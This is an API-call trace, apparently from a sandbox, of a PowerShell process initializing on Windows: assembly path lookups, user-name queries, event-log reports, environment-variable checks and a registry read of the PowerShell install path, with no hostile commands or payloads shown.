	[0537.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0537.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0537.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0538.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0538.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0538.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0538.447] CoTaskMemAlloc (cb=0x804) returned 0x1b85e960
	[0538.447] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b85e960, nSize=0xed248 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed248) returned 0x1
	[0538.447] CoTaskMemFree (pv=0x1b85e960) 
	[0538.447] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0538.447] GetUserNameW (in: lpBuffer=0x2c9220, pcbBuffer=0xed288 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed288) returned 1
	[0538.447] CoTaskMemFree (pv=0x2c9220) 
	[0538.448] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2df5888*="Registry", lpRawData=0x2df5618) returned 1
	[0539.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0539.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0539.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0539.446] CoTaskMemAlloc (cb=0x804) returned 0x1b85e960
	[0539.446] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b85e960, nSize=0xed248 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed248) returned 0x1
	[0539.447] CoTaskMemFree (pv=0x1b85e960) 
	[0539.447] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0539.447] GetUserNameW (in: lpBuffer=0x2c9220, pcbBuffer=0xed288 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed288) returned 1
	[0539.447] CoTaskMemFree (pv=0x2c9220) 
	[0539.448] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dfaca0*="Variable", lpRawData=0x2dfaa30) returned 1
	[0539.450] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0539.450] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0539.450] CoTaskMemFree (pv=0x30a930) 
	[0539.453] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0539.453] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0539.453] CoTaskMemFree (pv=0x30a930) 
	[0539.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xecaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0539.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xeca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0539.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xeca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0539.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xeca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0540.552] CoTaskMemAlloc (cb=0x804) returned 0x1b85e960
	[0540.552] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b85e960, nSize=0xed248 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed248) returned 0x1
	[0540.553] CoTaskMemFree (pv=0x1b85e960) 
	[0540.553] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0540.553] GetUserNameW (in: lpBuffer=0x2c9220, pcbBuffer=0xed288 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed288) returned 1
	[0540.553] CoTaskMemFree (pv=0x2c9220) 
	[0540.554] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e0e8b8*="Certificate", lpRawData=0x2e0e648) returned 1
	[0540.708] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0540.709] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0540.709] CoTaskMemFree (pv=0x30a930) 
	[0540.712] GetLogicalDrives () returned 0x4
	[0540.712] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xeced0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0540.712] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0540.713] CoTaskMemAlloc (cb=0x20e) returned 0x3170c0
	[0540.713] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3170c0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0540.713] CoTaskMemFree (pv=0x3170c0) 
	[0540.715] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0540.715] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0540.715] CoTaskMemFree (pv=0x30a930) 
	[0540.715] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0540.715] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0540.715] CoTaskMemFree (pv=0x30a930) 
	[0540.731] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0540.731] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0540.732] CoTaskMemFree (pv=0x30a930) 
	[0540.733] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0540.733] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0540.733] CoTaskMemFree (pv=0x30a930) 
	[0540.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xecc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0540.733] SetErrorMode (uMode=0x1) returned 0x1
	[0540.733] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xece90 | out: lpFileInformation=0xece90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0540.734] SetErrorMode (uMode=0x1) returned 0x1
	[0540.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xecc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0540.734] SetErrorMode (uMode=0x1) returned 0x1
	[0540.734] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xece90 | out: lpFileInformation=0xece90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0540.734] SetErrorMode (uMode=0x1) returned 0x1
	[0540.734] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0540.734] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0540.734] CoTaskMemFree (pv=0x30a930) 
	[0540.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xecdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0540.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xecef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0540.741] SetErrorMode (uMode=0x1) returned 0x1
	[0540.742] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xed150 | out: lpFileInformation=0xed150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0540.742] SetErrorMode (uMode=0x1) returned 0x1
	[0541.727] CoTaskMemAlloc (cb=0x804) returned 0x1b85e960
	[0541.728] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b85e960, nSize=0xed4b8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed4b8) returned 0x1
	[0542.602] CoTaskMemFree (pv=0x1b85e960) 
	[0542.602] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0542.602] GetUserNameW (in: lpBuffer=0x2c9220, pcbBuffer=0xed4f8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed4f8) returned 1
	[0542.603] CoTaskMemFree (pv=0x2c9220) 
	[0542.609] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e475a0*="Available", lpRawData=0x2e47330) returned 1
	[0543.555] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0543.555] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0543.555] CoTaskMemFree (pv=0x30a930) 
	[0543.557] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0543.557] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0543.557] CoTaskMemFree (pv=0x30a930) 
	[0543.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xece90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xece90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.563] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0543.563] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0543.563] CoTaskMemFree (pv=0x30a930) 
	[0543.563] CoTaskMemAlloc (cb=0x104) returned 0x30a930
	[0543.563] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x30a930, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0543.564] CoTaskMemFree (pv=0x30a930) 
	[0543.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xece90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xece90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xece90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xece90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xece90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xece90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.566] GetCurrentProcessId () returned 0x204
	[0543.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xece90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xece90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xece20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xece20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xece20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xece20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xece90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xece90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0543.573] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed4d8 | out: phkResult=0xed4d8*=0x384) returned 0x0
	[0543.573] RegQueryValueExW (in: hKey=0x384, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed45c, lpData=0x0, lpcbData=0xed458*=0x0 | out: lpType=0xed45c*=0x1, lpData=0x0, lpcbData=0xed458*=0x56) returned 0x0
	[0543.573] CoTaskMemAlloc (cb=0x5a) returned 0x1b844930
	[0543.573] RegQueryValueExW (in: hKey=0x384, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed42c, lpData=0x1b844930, lpcbData=0xed428*=0x56 | out: lpType=0xed42c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed428*=0x56) returned 0x0
	[0543.573] CoTaskMemFree (pv=0x1b844930) 
	[0543.574] RegCloseKey (hKey=0x384) returned 0x0
